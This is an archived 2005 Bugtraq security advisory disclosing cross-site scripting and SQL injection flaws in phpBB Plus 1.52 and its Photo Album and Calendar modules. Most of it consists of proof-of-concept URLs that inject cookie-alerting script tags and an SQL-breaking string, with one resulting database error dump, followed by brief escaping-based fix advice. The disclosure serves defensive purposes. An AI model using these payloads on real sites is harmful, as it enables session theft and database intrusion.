[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple Sql injection and XSS vulnerabilities in phpBB Plus
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-04-13 22:32:03
Message-ID: 20050413223203.25005.qmail () www ! securityfocus ! com
[Download RAW message or body]
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah
Severity: Medium
Title: Multiple Sql injection and XSS vulnerabilities in phpBB Plus v.1.52 and below \
and some of its modules.
Date: 13/04/2005
Vendor: PhpBB2 Plus and Smartor
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/
Summary: There are, multiple sql injection and xss vulnerabilities in phpbb plus \
v.1.52 and below and some of its modules..
Proof of Concept Exploits:
PhpBB Plus v.1.52 and below
http://localhost/groupcp.php?g=881&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/index.php?c=1&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=5e4b2554e73f8ca07f348b5f68c85217
Pops cookie
http://localhost/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=5e4b2554e73f8ca07f348b5f68c85217
Pops cookie
http://localhost/portal.php?article=0&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59
Pops cookie
http://localhost/viewforum.php?f=1&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/viewtopic.php?p=58834&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
Photo Album v2.0.53
http://localhost/album_search.php?mode='SQL_INJECTION&search=dcrab
SQL INJECTION
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that \
corresponds to your MySQL server version for the right syntax to use near 'LIKE \
'%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_c
SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, p.pic_time, \
p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM phpbb_album AS \
p,phpbb_album_cat AS c WHERE p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' AND \
p.pic_cat_id = c.cat_id OR p.pic_cat_id = 0 AND p.pic_approval = 1 AND LIKE \
'%\'SQL_INJECTION%' ORDER BY p.pic_time DESC
Line : 105
File : album_search.php
http://localhost/album_cat.php?cat_id=5&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/album_comment.php?pic_id=224&%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
Calender MOD
http://localhost/calendar_scheduler.php?d=1113174000&mode=&start='"><script>alert(document.cookie)</script>&%3bsid=d32836b8178e5d62b2b173ed177e4b0d
Pops cookie
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding \
with php.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic